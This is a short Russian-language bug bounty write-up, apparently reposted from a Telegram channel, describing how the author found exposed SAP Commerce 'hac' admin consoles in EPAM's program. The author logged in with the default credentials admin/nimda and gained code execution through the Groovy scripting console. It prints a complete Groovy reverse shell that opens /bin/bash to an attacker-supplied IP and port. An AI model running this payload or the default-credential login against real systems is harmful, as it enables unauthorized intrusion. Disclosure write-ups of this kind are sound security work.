2 RCE в багбаунти программе EPAM

2 RCE в багбаунти программе EPAM

SHADOW:Group

Оригинал статьи на английском тут.

Когда я хантил по баунти-программе Epam, я зашел в shodan и ввел запрос “ssl:epam.com”. Там мне попался ip 40.117.**.***. Я использовал dirsearch для брута директорий и нашел эндпоинт http://40.117.**.***/hac/login/

“The hac extension is the default administration web application of SAP Commerce”.

Я погуглил дефолтные учетные данные и нашел их тут:

https://www.cloudnir.com/sap-commerce-cloud-consoles/hybris-administrative-console-hac/

Имя пользователя: admin

Пароль: nimda

И это сработало, я вошел в панель администратора.

Я изучил панель и заметил вкладку с консолью ==> http://40.117.**.***/hac/console/scripting/

Данная консоль поддерживает скриптовый язык Groovy, о котором вы можете узнать больше по данной ссылке - https://en.wikipedia.org/wiki/Apache_Groovy

Затем я использовал этот код, чтобы получить удаленное выполнение кода

String host="Your Ip Here";
int port=Your Port;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Вы можете найти больше пэйлоадов здесь https://coldfusionx.github.io/posts/Groovy_RCE/

После того, как я получил RCE, я снова пошел в Shodan и поискал другие IP-адреса, и нашел такое же приложение hac, о чем также сообщил программе Epam.

Видео с PoC доступно тут:

На этом все, спасибо за просмотр!

Подпишись на канал - @shadow_group_tg.

Report Page